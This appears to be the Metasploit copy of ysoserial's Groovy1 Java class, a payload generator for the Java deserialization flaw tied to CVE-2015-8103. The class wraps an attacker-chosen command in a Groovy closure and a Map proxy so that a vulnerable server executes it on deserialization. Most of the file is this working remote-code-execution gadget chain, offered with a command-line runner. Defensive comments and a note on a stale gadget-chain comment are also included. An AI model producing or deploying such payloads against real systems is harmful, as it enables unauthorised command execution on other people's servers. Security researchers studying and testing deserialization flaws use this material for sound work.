GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-8103/payloads/Groovy1.java
package ysoserial.payloads;
import java.lang.reflect.InvocationHandler;
import java.util.Map;
import org.codehaus.groovy.runtime.ConvertedClosure;
import org.codehaus.groovy.runtime.MethodClosure;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
/*
    Gadget chain:
        ObjectInputStream.readObject()
            PriorityQueue.readObject()
                Comparator.compare() (Proxy)
                    ConvertedClosure.invoke()
                        MethodClosure.call()
                            ...
                                Method.invoke()
                                    Runtime.exec()

    Requires:
        groovy
 */
/**
 * ysoserial payload generator for the Groovy runtime; the {@code @Dependencies}
 * annotation pins it to {@code org.codehaus.groovy:groovy:2.3.9}.
 *
 * <p>The object graph built here is only meaningful to a target that passes
 * untrusted bytes to {@code ObjectInputStream.readObject()} with that Groovy
 * artifact on its classpath. From the defender's side, the relevant controls
 * are: do not Java-deserialize untrusted input, install a
 * {@code java.io.ObjectInputFilter} allow-list where deserialization cannot be
 * removed, and keep Groovy off the classpath (or updated) where it is not
 * needed.
 *
 * <p>NOTE(review): the gadget-chain comment at the top of this file lists a
 * {@code PriorityQueue} / {@code Comparator.compare()} entry point, but the
 * code below proxies {@code Map} and hooks {@code entrySet}. The comment looks
 * stale for this class; confirm against {@code Gadgets}.
 */
@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"org.codehaus.groovy:groovy:2.3.9"})
public class Groovy1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {

    /**
     * Builds the serializable object graph for the given command string.
     *
     * @param command the string the {@code MethodClosure} is bound to; the
     *                closure names the method {@code "execute"} on it, and the
     *                file's gadget-chain comment states the call ends in
     *                {@code Runtime.exec()}
     * @return the handler produced by
     *         {@code Gadgets.createMemoizedInvocationHandler} around the
     *         proxied map
     * @throws Exception declared for whatever the {@code Gadgets} helpers throw
     */
    public InvocationHandler getObject(final String command) throws Exception {
        // Closure that, when called, invokes the method named "execute" on the command String.
        final MethodClosure executeOnCommand = new MethodClosure(command, "execute");

        // Route only the "entrySet" method of the proxied interface to that closure.
        final ConvertedClosure entrySetHook = new ConvertedClosure(executeOnCommand, "entrySet");

        // Dynamic proxy that presents the hook as a Map.
        final Map proxiedMap = Gadgets.createProxy(entrySetHook, Map.class);

        // presumably a handler whose deserialization touches entrySet() on the
        // wrapped map; verify in Gadgets
        return Gadgets.createMemoizedInvocationHandler(proxiedMap);
    }

    /**
     * Command-line entry point; hands this class and the raw arguments to
     * {@code PayloadRunner.run}.
     *
     * @param args forwarded unchanged to {@code PayloadRunner.run}
     * @throws Exception propagated from {@code PayloadRunner.run}
     */
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(Groovy1.class, args);
    }
}